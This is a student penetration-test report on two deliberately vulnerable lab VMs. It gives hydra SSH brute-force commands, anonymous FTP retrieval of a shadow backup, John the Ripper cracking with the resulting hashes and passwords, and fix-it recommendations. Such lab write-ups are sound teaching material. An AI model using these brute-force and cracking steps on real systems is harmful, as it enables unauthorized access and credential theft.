final project report project report [nts330 – final] v1.0 juan ortega 4/26/2011 2 juan ortega,...

1 Juan Ortega, [email protected]

1

Final Project Report [NTS330 – Final]

V1.0

Juan Ortega

4/26/2011


2

Document Properties

Title Deviant Alert, Inc. Penetration Active Recon Report Version V1.0 Author Juan Ortega Pen-testers Juan Ortega Reviewed By Approved By Classification Confidential

Version Control

Version Date Author Description

V1.0 April 26,2011 Juan Ortega Final Draft

Disclaimer:

This penetration report is for educational purposes only. Penetration testing tools (enumeration, vulnerability scanning, and passive/active recon) are tested within a private virtual network set up surely for the purpose of elevating my knowledge. Everything within this document is factious; any similarities to actual things are purely coincidence.


3

1. Executive Summary

Both PenTest Lab Disk boxes were different and similar in some ways. The first 1.100 box had many more security holes to it revealing a few high vulnerabilities in Nessus, and even an exploit on Metasploit. Sadly, none of them worked, but using usernames from emails from the http server, hydra was used to brute force the OpenSSH server and successfully attained the passwords. Once inside another user with wheel privileges would have to be cracked. Once that password was attained, it was a simple 'sudo' command for root privileges. The second box started out in a similar way, however there was an ftp running with anonymous login to this box; and after experimenting for a while, a false 'shadow' file, and 'core' file was found this seemed to be a backup of some sort. Using 'strings' command to print printable strings, the real shadow file was attained. After using john and wordlist to crack, root privileges were attained. Overall it seemed challenging but not too hard and not to easy.


4

Table of Contents

1. Executive Summary --------------------------------------------------------------------------------------------- 3

Table of Illustrations ------------------------------------------------------------------------------------------------- 5

1.0 Project Objectives ------------------------------------------------------------------------------------------ 5

2.0 Timeline ------------------------------------------------------------------------------------------------------- 5

3.0 Summary of Findings -------------------------------------------------------------------------------------- 5

4.0 Summary of Recommendation -------------------------------------------------------------------------- 6

5.0 Detailed Findings ------------------------------------------------------------------------------------------- 6

5.1 Level 1 – [PenTest Lab Desk 1.100] -------------------------------------------------------------------- 6

5.1.1 Scope of Work ------------------------------------------------------------------------------------- 6

5.1.2 Assessment Guided Questions ---------------------------------------------------------------- 7

5.2 Lab 2 – [PenTest Lab Desk] ------------------------------------------------------------------------------- 9

5.2.1 Scope of Work ------------------------------------------------------------------------------------ 9

5.2.2 Assumptions ------------------------------------------------------------------------------------- 10

5.2.3 Findings (Figures are located in Appendix) ----------------------------------------------- 10

6.0 Appendix ---------------------------------------------------------------------------------------------------- 13

7.0 References -------------------------------------------------------------------------------------------------- 16


5

Table of Illustrations

1.0 Project Objectives

1.1 The objectives are the following:

1.1.1 Break into PenTest Lab Disk 1.100 and attain root privileges, document your findings.

1.1.2 Break into PenTest Lab Disk 1.110 and attain root privileges, document your findings.

2.0 Timeline

The timeline of the test:

Penetration Testing Start Date/Time End Date/Time

Level 1 24 April 2010 26 April 2010 Level 2 24 April 2010 26 April 2010

Table 1 Control Testing Timeline

3.0 Summary of Findings

3.1 This box was not too hard to get into. There were many ports open to scan for vulnerabilities and experiment upon. A few failures at the start with Nessus and Metasploit but it seems brute force did the trick with dictionary passwords. Hydra, john, and ssh were only used to get into the system knowing the users from the http server.

3.2 In the beginning it looked like the last box, the usernames were in the http server as well; but it went downhill when hydra couldn't find the initial password. Since the ftp server was working some investigation there was necessary. The 'download' file looked like a backup from an older version since some root directories were there. The /download/etc/shadow file looked precious, but turned out to be wrong password. Maybe it was the backup for the other box? The only interesting file was the 'core' file also found in /download/etc which contained random data. New commands learned was 'strings' that parsed through the data and printed character text revealing the actual shadow file information. Using john the ripper to brute force the shadow file was unsuccessful, as the users learned from the


6

last box and increased the size of their characters; however they were still vulnerable to dictionary attacks, and finally the root and user 'ccoffee' password was attained.

4.0 Summary of Recommendation

4.1 This box has many ports open that most seem to not even be in use. The ftp-data is open but unusable. The ftp server is up but broken. OpenSSH seems to be outdated. The SMTP, POP3, IMAP servers are outdated as well. The web site contained email addresses that were also users of the system; and the httpd was closed so nothing there. Recommendations would be to set up a host-based firewall to filter out ports. Upgrade the OS since its running a very old kernel 2.6.16 and vulnerable to local root privilege escalation. Only one non-user email address should be on display on the http server; or preferably close it and run it on https. As for the old daemons (smtp, pop3, imap), Nessus was able to find some mild and small vulnerabilities to look out for those and keep them updated; maybe a buffer overflow would of worked.

4.2 There were fewer ports revealed in this box from the last one; but still no firewall in place. The email addresses should not be in the http server again; all of the usernames will be revealed and are vulnerable to brute forcing attacks. The ftp server should have the ‘anonymous’ user disabled; or at least chroot’ed and segregated from the rest of the file system, don’t have it in the same directory as were the backups are stored, that is just laziness. Lastly the password was still very easy to crack because they were on a dictionary. I recommend a password policy where it must be over 8 characters long, both lower and upper characters, as well as numerical for strong passwords.

5.0 Detailed Findings

5.1 Level 1

5.1.1 Scope of Work

To download PenTest Lab Disk 1.100 from forums.heorot.net web site and run it inside a VM. The scope will be to try to get root privileges into the systems whatever means possible. The scenario consists of you proving to the CEO that more security is necessary and that their systems are vulnerable.

5.1.2 Assumptions


7

No assumptions are made. Not sure how difficult the boxes will be to break into, but giving what was learned from past experiences and exercise, this should be a simple or challenging task.

5.1.3 Findings (Figures are located in Appendix)

5.1.3.1 Reconnaissance

First thing to do on a target system is to run a simple port scan.

1) $ nmap –n 192.168.1.100 Ports open: 20 (ftp-data), 21 (ftp), 22 (ssh), 25 (smtp), 80 (http). 110 (pop3), 143 (imap), 443 (https).

The Slax box had a number of open ports with outdated version numbers next to them. The next thing to try would be if Nessus picks up anything. As it turns out Nessus found 7 high vulnerabilities retaining to the www (80) protocol that was open, most of them dealing with outdated PHP. Nessus also found:

Apache mod_rewrite LDAP Protocol URL Handling Overflow, CVE-2006-3747

We open Metasploit for any matching exploits of the vulnerabilities Nessus found. The autopwn found only one and it’s the exploit above; however, all of the payloads assume it is a Windows host, and the generic payloads would not work neither; it seems Metasploit is useless in this case.

Failing on Metasploit I turned to each of the protocols. Since port 80 is open, opening up the web Brower http://192.168.1.100 will reveal a page. On index2.php at the bottom displays a list of email addresses. These names of the emails could be used as log in named so they will be saved and stripped the address.

Users found:

marym, patrickp, thompsont, benedictb, genniege, michaelp, longe, adamsa, banter, coffee, banterb

Switched the last name to the first name:

mmary, ppatrick, tthompson, bbenedict, egennieg, pmichael, elong, aasam, rbanter, ecoffe, bbanter

http://192.168.1.100/


8

5.1.3.2 Attack

The ftp server seems to be not working. The OpenSSH server seems to be up. The SMTP doesn’t seem to reveal any vulnerability. The POP3 (110) daemon does not have any critical vulnerabilities, so nothing much to do there; and port 443 (https) is closed. All that has been acquired are usernames; nothing else to do but brute force the OpenSSH.

# hydra 192.168.1.100 ssh2 –L /root/usernames2 –p password –e s –t 36

Hydra is a powerful brute force supporting many protocols. The command I used loads up the usernames retrieved from the email addresses above. This command will try the password ‘password’ and with ‘-e s’ hydra will also try the username as the password as well. The ‘-t 36’ means it will retry only 36 times.

[22][ssh2] host: 192.168.1.100 login: bbanter password: bbanter

Success, the login name for bbanter is also the password.

$ ssh [email protected]

password: bbanter

bbanter@slax:~$

The login was successful and now has control over the box with limited privileges. Next thing would be to get a list of users.

bbanter@slax:~$ cat /etc/passwd

aadams:x:1000:10…:/home/aadams:/bin/bash

bbanter:x:1001:100:…/home/bbanter:/bin/bash

ccoffee:x:1002:100:…./home/ccoffee:/bin/bash

It seems as the user aadams belongs to group 10, which is the wheel group. This means this user can invoke ‘sudo’ and elevate to root privileges.

bbanter@slax:~$ uname –r

2.6.16

Because this is an old kernel, one option that came up was to use ‘vmsplice’ to elevate privileges. One problem was the vmsplice only works from 2.6.17 – 2.6.24.1 so odds are, it might not work.

mailto:[email protected]


9

After uploading vmsplice using ‘scp’ all that was left was to execute it. Unfortunately, it did not work out so well and failed.

If finding out the password for bbanter was that easy, the same method might work on aadams. After downloading a wordlist from the web, hydra is used again using the word list on that user.

# hydra 192.168.1.100 ssh2 –l aadams –P /root/wordlist.txt

[22][ssh2] host: 192.168.1.100 login: aadams password: nostradamus

Again, success hydra was able to find the password for aadams.

We know aadams can invoke ‘sudo’ for admin privileges so root access should be able to obtain.


password: nostradamus

aadams@slax:~$ sudo cat /etc/shadow

password: nostradamus

root:$1$TOi0HE5n$j3obHaAlUdMbHQnJ4Y5Dq0:13553:0::

:::

Although root privileges have already been attained, it’s necessary to get the actual root password. Because we now have the hash, it’s time to use john and crack the password. Next is to unshadow ‘passwd’ and ‘shadow’

$ /usr/bin/john/unshadow passwd shadow > unshadow

$ sudo john –users=root –i=alpha unshadow

tarot (root)

The root password is: tarot

5.2 Level 2

5.2.1 Scope of Work

The scope of this exercise is to break into 192.168.1.110 and obtain root privileges. The scenario is since the CEO thought the



10

last box was too easy, this new one should be a bit difficult to get into as it was “reconfigured it”. The PenTest Lab Disk 1.110 will be loaded into a VM and will be attacked.

5.2.2 Assumptions

The last box was not too difficult, but seeing as this is more difficult as the scenario describes. The outcome is unknowable. If the results are the same, the same method from the last box will be used but I expect it not to work.

5.2.3 Findings (Figures are located in Appendix)


First thing to do is do a port scan:

$ nmap –n 192.168.1.110

Ports revealed open: ftp (21), ssh (22), http (80), ipp (631).

Next step was to launch Nessus and see any if any vulnerabilities exist.

Nessus found 2 high vulnerabilities in www (80):

Apache 2.2 < 2.2.14 Multiple Vulnerabilities CVE-2009-2699

Apache 2.2 < 2.2.15 Multiple Vulnerabilities CVE-2009-3555

Unfortunately there are no Metasploit exploits that work with these vulnerabilities. Next step I would take is looking up the web site again.

Like the last exercise, a few usernames in emails were revealed:

adamsa, banterb, ccoffee, aadams, bbanter, ccoffee

5.2.3.2 Attack

Next like last time hydra was tried.

# hydra 192.168.1.110 ssh2 –L /root/usernames3 –p password –e s –t 36

Unfortunately, hydra was not able to find passwords with the same as their username. Looking back at the ports, the FTP looks interesting and see if I can log in anonymous, if not let’s try one of the usernames.

$ ftp 192.168.1.110


11

Name (192.168.1.110:anonymous): anonymous

230 Login successful.

ftp>

It looks like anyone is able to log in anonymously through the ftp server, time to explore. In the download folder there is a shadow file containing a salted root password, lets grab that and crack it.

ftp> get /download/etc/shadow

$ john –i=alpha shadow

tarot (root)

It looks like the root password was found, only problem is, that doesn’t look right. More investigation is necessary.

Inside the ftp server again in /download/etc there is a file called “core” that looks rather interesting.

$ get /download/etc/core

$ cat core

Invoking cat to the core file will reveal random data – nothing useful. After a few digging on the Internet, there is a command called “strings” that may reveal printable strings.

$ strings core > usernames4

root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::

aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:13570:0:99999:7::

:

bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:13571:0:99999:7:

::

ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:13574:0:99999:7:

::

After a few trimming these salted hashes are revealed. It looks like the users root, aadams, bbanter, and ccoffee are active. Unfortunately, there’s no way to look at what groups they belong too, only option is to brute force the passwords.

$ john –i=alpha usernames4

….

This is taking too long; it looks like the passwords are too big; using a word list might be more useful.


12

$ john –rules –wordlist=wordlist.txt usernames4

Complexity (root)

Diatomaceous (ccoffee)

Next thing is to log into the OpenSSH using ccoffee.


password: Diatomaceous

Linux 2.6.16

ccoffee@slax:~$ su

password: Complexity

root@slax:~$

Success, root privileges is attained.



13

6.0 Appendix

6.1 Level 1


5.1.3.2 Attack


14


15

6.2 Level 2


5.2.3.2 Attack


16

7.0 References

1. THC-HYDRA – fast and flexible network login hacker. Retrieved April 26, 2011 from THC Web site: http://www.thc.org/thc-hydra/

2. John The Ripper password cracker. Retrieved April 26, 2011 from openwall Web site: http://www.openwall.com/john/

3. Kevin’s Word List Page. Retrieved April 26, 2011 from sourceforge Web site: http://wordlist.sourceforge.net/

http://www.thc.org/thc-hydra/

http://www.openwall.com/john/

http://wordlist.sourceforge.net/

final project report project report [nts330 – final] v1.0 juan ortega 4/26/2011 2 juan ortega,...

Documents